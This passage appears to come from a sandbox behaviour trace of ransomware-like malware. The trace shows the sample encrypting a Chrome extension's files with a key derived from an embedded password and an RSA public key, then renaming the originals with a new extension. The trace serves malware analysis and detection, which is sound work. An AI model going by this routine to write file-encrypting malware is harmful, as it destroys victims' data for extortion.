lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.097] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.097] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.097] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.097] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.097] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.097] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.098] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.098] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.098] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.098] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.098] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x6c, lpOverlapped=0x0) returned 1 [0254.098] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x6c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x70) returned 1 [0254.098] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x70, lpOverlapped=0x0) returned 1 [0254.098] CloseHandle (hObject=0x5d50) returned 1 [0254.098] CloseHandle (hObject=0x5d64) returned 1 [0254.099] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), bFailIfExists=0) returned 1 [0254.102] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js", dwFileAttributes=0x0) returned 1 [0254.103] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg")) returned 1 [0254.104] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.fuck")) returned 1 [0254.105] CryptDestroyHash (hHash=0x2985ea0) returned 1 [0254.105] CryptDestroyKey (hKey=0x29384f8) returned 1 [0254.105] CryptReleaseContext (hProv=0x293aae8, dwFlags=0x0) returned 1 [0254.105] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0254.105] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0254.106] GetLastError () returned 0x0 [0254.106] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json")) returned 0x20 [0254.106] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0254.108] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0254.109] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.109] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0254.110] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x28f5c60) returned 1 [0254.112] CryptCreateHash (in: hProv=0x28f5c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0254.112] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.112] CryptHashData (hHash=0x29384f8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.112] CryptDeriveKey (in: hProv=0x28f5c60, Algid=0x6610, hBaseData=0x29384f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2985ea0) returned 1 [0254.113] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.113] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0254.113] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x29876d0) returned 1 [0254.113] CryptImportPublicKeyInfo (in: hCryptProv=0x29876d0, dwCertEncodingType=0x1, pInfo=0x298eb50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298eb80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298eb88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2985f20) returned 1 [0254.113] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0254.113] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989738*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2989738*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0254.114] WriteFile (in: hFile=0x5d50, lpBuffer=0x2989738*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2989738*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0254.115] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.122] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.136] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x231, lpOverlapped=0x0) returned 1 [0254.136] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x231, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x240) returned 1 [0254.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x240, lpOverlapped=0x0) returned 1 [0254.137] CloseHandle (hObject=0x5d64) returned 1 [0254.137] CloseHandle (hObject=0x5d50) returned 1 [0254.137] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), bFailIfExists=0) returned 1 [0254.140] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0254.140] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.gsg")) returned 1 [0254.142] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.fuck")) returned 1 [0254.143] CryptDestroyHash (hHash=0x29384f8) returned 1 [0254.143] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0254.143] CryptReleaseContext (hProv=0x28f5c60, dwFlags=0x0) returned 1 [0254.143] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0254.143] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0254.143] GetLastError () returned 0x0 [0254.144] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js")) returned 0x20 [0254.144] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js", dwFileAttributes=0x80) returned 1 [0254.144] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.145] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0254.146] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg", dwFileAttributes=0x2) returned 1 [0254.146] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293aae8) returned 1 [0254.149] CryptCreateHash (in: hProv=0x293aae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0254.149] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.149] CryptHashData (hHash=0x29384f8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.149] CryptDeriveKey (in: hProv=0x293aae8, Algid=0x6610, hBaseData=0x29384f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2985ea0) returned 1 [0254.149] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.149] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0254.149] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 